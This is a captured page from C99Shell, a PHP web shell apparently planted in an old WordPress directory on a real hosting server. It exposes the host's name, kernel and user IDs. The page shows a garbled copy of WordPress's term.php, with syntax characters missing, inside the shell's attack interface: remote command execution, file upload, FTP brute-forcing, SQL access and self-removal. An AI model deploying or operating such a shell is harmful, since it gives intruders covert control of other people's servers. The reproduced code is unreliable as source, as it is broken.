!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-admin/   drwxr-xr-x
Free 183.09 GB of 490.84 GB (37.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     term.php (2.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Edit Term Administration Screen.
 *
 * @package WordPress
 * @subpackage Administration
 * @since 4.5.0
 */

/** WordPress Administration Bootstrap */
require_once( dirname__FILE__ ) . '/admin.php' );

if ( empty( 
$_REQUEST['tag_ID'] ) ) {
    
$sendback admin_url'edit-tags.php' );
    if ( ! empty( 
$taxnow ) ) {
        
$sendback add_query_arg( array( 'taxonomy' => $taxnow ), $sendback );
    }
    
wp_redirectesc_url$sendback ) );
    exit;
}

$tag_ID absint$_REQUEST['tag_ID'] );
$tag    get_term$tag_ID$taxnowOBJECT'edit' );

if ( ! 
$tag instanceof WP_Term ) {
    
wp_die__'You attempted to edit an item that doesn&#8217;t exist. Perhaps it was deleted?' ) );
}

$tax      get_taxonomy$tag->taxonomy );
$taxonomy $tax->name;
$title    $tax->labels->edit_item;

if ( ! 
in_array$taxonomyget_taxonomies( array( 'show_ui' => true ) ) ) ||
     ! 
current_user_can'edit_term'$tag->term_id )
) {
    
wp_die(
        
'<h1>' __'Cheatin&#8217; uh?' ) . '</h1>' .
        
'<p>' __'Sorry, you are not allowed to edit this item.' ) . '</p>',
        
403
    
);
}

$post_type get_current_screen()->post_type;

// Default to the first object_type associated with the taxonomy if no post type was passed.
if ( empty( $post_type ) ) {
    
$post_type reset$tax->object_type );
}

if ( 
'post' != $post_type ) {
    
$parent_file  = ( 'attachment' == $post_type ) ? 'upload.php' "edit.php?post_type=$post_type";
    
$submenu_file "edit-tags.php?taxonomy=$taxonomy&amp;post_type=$post_type";
} elseif ( 
'link_category' == $taxonomy ) {
    
$parent_file  'link-manager.php';
    
$submenu_file 'edit-tags.php?taxonomy=link_category';
} else {
    
$parent_file  'edit.php';
    
$submenu_file "edit-tags.php?taxonomy=$taxonomy";
}

get_current_screen()->set_screen_reader_content( array(
    
'heading_pagination' => $tax->labels->items_list_navigation,
    
'heading_list'       => $tax->labels->items_list,
) );

require_once( 
ABSPATH 'wp-admin/admin-header.php' );
include( 
ABSPATH 'wp-admin/edit-tag-form.php' );
include( 
ABSPATH 'wp-admin/admin-footer.php' );

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0069 ]--